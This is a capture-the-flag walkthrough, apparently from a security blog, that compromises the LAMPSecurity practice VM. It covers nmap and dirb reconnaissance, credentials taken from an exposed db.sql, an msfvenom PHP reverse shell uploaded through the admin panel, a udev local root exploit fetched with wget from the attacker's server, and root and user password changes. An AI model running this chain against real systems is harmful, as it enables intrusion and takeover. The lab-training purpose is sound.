The LAMPSecurity project is an effort to
produce training and benchmarking tools that can be used to educate information
security professionals and test products. Please note there are other capture
the flag exercises too.
These exercises can be used for training
purposes by following this documentation. Alternatively, you may wish to test
new tools, using the CTF virtual machines as targets. This is especially
helpful in evaluating the effectiveness of vulnerability discovery or
penetration testing tools.
Download from Here.
Penetration
Testing Methodology
·
Network Scanning
o
netdiscover
o
nmap port scan
·
Enumeration
o
Performing Directory Bruteforce
o
Exploring directories to find out the
username and password
·
Exploiting
o
Using a backdoor
o
Using netcat/msfconsole
·
Privilege Escalation
o
Changing the password of root and
other users
Walkthrough
Network
Scanning
The first step to attack is to identify the
target. So, to identify the target, we will use the following command:
netdiscover
Now we will use nmap to gain information about
the open ports and the services running on the target machine using the following
command
nmap -sV -sT -p- 192.168.43.30
Enumeration
Further, we need to start enumeration against
the host machine, therefore we navigated to a web browser for exploring
different service. Here we have a web application so let’s explore the web application.
http://192.168.43.30
Further, let’s try to find some hidden files
and directories. Finding files and directories can discover much useful
information like username, password or some configuration files, etc. We will
use the following command for the said:
dirb http://192.168.43.30
We found two major directories i.e. /files/
and /sql/. We can tell from their names that are quite important.
Now our next step is to explore these two
directories. We can also explore other directories but the rest of the
directories don’t seem to be useful for us.
http://192.168.43.30/files/
On exploring the files/ directory there
multiple valid and useful files we found with a lot of information as you can
see in the image below:
http://192.168.43.30/sql/db.sql/
Upon traversing through sql/ directory, we
found a db.sql and when opened it gave us all the information about the
database including username and password just as shown in the image below:
Now let’s try to login into the admin panel
using the username: ‘admin’ and password: ‘adminpass’
We succeed in login. Now we have the admin
panel from where we can manage the web application. Let’s see if we can add
some more pages to the application so that we can upload a PHP backdoor.
As we can add a new event, so, here we will
create a backdoor using msfvenom first and then we will upload this shell.php
file on the website. To create the shell type:
msfvenom -p php/meterpreter/reverse_tcp -o
/root/Music/shell.php lport=4444 lhost=192.168.43.248
After this, upload the shell by adding a new
event as shown in the image below:
Finally, we have uploaded a malicious file.
Now we will use msfconsole or we can also use netcat to get a session in order
to perform more operations to gain root access.
So, to access the ‘shell.php’ we will explore
the directory URL: http://192.168.43.30/files/
Now let’s fire up the msfconsole and we have
to type in these commands in msfconsole to get a session
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload
php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost
192.168.43.248
msf5 exploit(multi/handler) > set lport
4444
msf5 exploit(multi/handler) > exploit
Press enter after typing ‘exploit’ and go back
to the URL: http://192.168.43.30/files/
And click on ‘shell.php’ and then come back to
the msfconsole, now we can see we have got a session.
Now we have a session, so let’s run the
command ‘sysinfo’ to find out some information related to kernel version and its
architecture.
sysinfo
Kernel version is 2.6.18-92.el5 .
We have to search a lot to know more about
this kernel version and after doing a lot of research we find out that this
kernel version is vulnerable to udev exploit.
Now, we will use a script to gain root access,
script name is 8478.sh, we can find this exploit/code in our Kali Linux OS.
Let’s copy this file from our OS to the
directory where we have created our backdoor that is /root/Music using the cp command:
cp /usr/share/exploitdb/exploits/linux/local/8478.sh
/root/Music
cd /root/Music/
ls -l
Now, let’s run a simple HTTP Server using
python so that we can download this file in our targeted system.
python -m SimpleHTTPServer
Now let’s drop a shell in our targeted system
using the same meterpreter session
sysinfo
This is a very limited shell. using this shell,
we can’t do privilege escalation. Now for gaining a more advance shell, we will
use python’s pty module using the following command
python -c 'import pty; pty.spawn("/bin/bash")'
Now we have a shell where we can try different
commands to gain root access. First of all, let’s change the directory to /tmp
using the cd command
cd /tmp
pwd
Now we have to download 8478.sh file here so
that we can exploit the system. We can download the file using wget command:
wget http://192.168.43.248:8000/8478.sh -q
Now change the permissions to executable using
the chmod command:
ls
chmod +x 8478.sh
It’s time to run the script and gain the root
access, run the script using ‘./8478.sh’
./8478.sh
Many of us will get this error. We will search
for this error and finally we have found a solution to this error we can
resolve this issue using the following command:
sed -i -e 's/\r$//' 8478.sh
Try again to run the script using:
./8478.sh
The reason behind this error is, it requires
some experimentation as you have to provide the proper PID to the script in
order for the code to work. So now we have to find a proper PID and with the
help of that PID, we will run the script. To get the PID run the following
command:
cat /proc/net/netlink
Run the script again using the PID 376 using
the command below:
./8478.sh 376
whoami
Boom! We have gained the root access!
Let’s do some more operations. Head into the
/home directory using command cd /home. In the home directory, we have to find
out more users. As we are root, we can change any user password using the
command passwd john similarly we can change the root password using the same
command.
passwd root
id
su john
su -l
ls
0 comments:
Post a Comment